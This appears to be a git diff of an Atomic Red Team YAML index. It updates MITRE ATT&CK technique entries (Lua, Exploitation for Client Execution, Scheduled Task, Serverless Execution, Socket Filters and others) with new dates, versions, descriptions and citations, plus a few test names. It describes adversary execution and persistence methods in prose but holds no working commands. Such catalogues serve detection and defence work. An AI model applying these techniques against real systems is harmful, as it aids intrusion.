+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -31875,7 +32254,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -31902,30 +32281,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -31942,9 +32303,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -31952,21 +32314,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -32016,7 +32394,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests:
     - name: Execute shell script via python's command mode arguement
@@ -32209,23 +32586,7 @@ execution:
         name: sh
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -32236,32 +32597,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
         Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -32304,12 +32677,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.003
     atomic_tests: []
   T1651:
     technique:
-      modified: '2024-04-12T03:27:48.171Z'
+      modified: '2024-10-15T13:42:42.543Z'
       name: Cloud Administration Command
       description: |-
         Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -32366,11 +32738,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:43:27.104Z'
       name: 'Command and Scripting Interpreter: Visual Basic'
       description: |-
         Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -32435,14 +32806,13 @@ execution:
         url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.005
     atomic_tests: []
   T1648:
     technique:
-      modified: '2024-03-05T16:13:38.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Serverless Execution
       description: "Adversaries may abuse serverless computing, integration, and automation
         services to execute arbitrary code in cloud environments. Many cloud providers
@@ -32463,14 +32833,19 @@ execution:
         an adversary may create a Lambda function that automatically adds [Additional
         Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
         and a corresponding CloudWatch events rule that invokes that function whenever
-        a new user is created.(Citation: Backdooring an AWS account) Similarly, an
-        adversary may create a Power Automate workflow in Office 365 environments
-        that forwards all emails a user receives or creates anonymous sharing links
-        whenever a user is granted access to a document in SharePoint.(Citation: Varonis
-        Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+        a new user is created.(Citation: Backdooring an AWS account) This is also
+        possible in many cloud-based office application suites. For example, in Microsoft
+        365 environments, an adversary may create a Power Automate workflow that forwards
+        all emails a user receives or creates anonymous sharing links whenever a user
+        is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+        Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+        environments, they may instead create an Apps Script that exfiltrates a user's
+        data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+        OWN-CERT Google App Script 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Shailesh Tiwary (Indian Army)
       - Praetorian
@@ -32479,16 +32854,18 @@ execution:
       - Varonis Threat Labs
       - Alex Soler, AttackIQ
       - Vectra AI
+      - OWN
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'Application Log: Application Log Content'
@@ -32514,6 +32891,14 @@ execution:
         description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
           Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
         url: https://www.varonis.com/blog/power-automate-data-exfiltration
+      - source_name: Cloud Hack Tricks GWS Apps Script
+        description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+          2024.
+        url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+      - source_name: OWN-CERT Google App Script 2024
+        description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+          analysis. Retrieved October 2, 2024.
+        url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
       - source_name: Cado Security Denonia
         description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
           Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -32528,29 +32913,10 @@ execution:
         url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
-      type: attack-pattern
-      created: '2020-03-11T14:43:31.706Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1204.001
-        url: https://attack.mitre.org/techniques/T1204/001
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-10T16:40:03.786Z'
       name: Malicious Link
       description: An adversary may rely upon a user clicking a malicious link in
         order to gain execution. Users may be subjected to social engineering to get
@@ -32563,25 +32929,41 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
 
         Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+      created: '2020-03-11T14:43:31.706Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1204/001
+        external_id: T1204.001
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1569.002:
     technique:
-      modified: '2023-08-14T15:53:00.999Z'
+      modified: '2024-10-15T16:41:40.247Z'
       name: 'System Services: Service Execution'
       description: |-
         Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).
@@ -32631,9 +33013,8 @@ execution:
         url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1569.002
     atomic_tests:
     - name: psexec.py (Impacket)
@@ -32684,10 +33065,10 @@ execution:
         name: bash
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -32750,7 +33131,7 @@ execution:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -32784,8 +33165,8 @@ execution:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -32794,6 +33175,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -32806,7 +33191,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At - Schedule a job
@@ -32857,23 +33241,24 @@ execution:
 persistence:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -32920,7 +33305,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -32952,8 +33337,8 @@ persistence:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -32967,6 +33352,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -32979,16 +33368,19 @@ persistence:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -33051,7 +33443,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037:
     technique:
@@ -33116,49 +33507,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
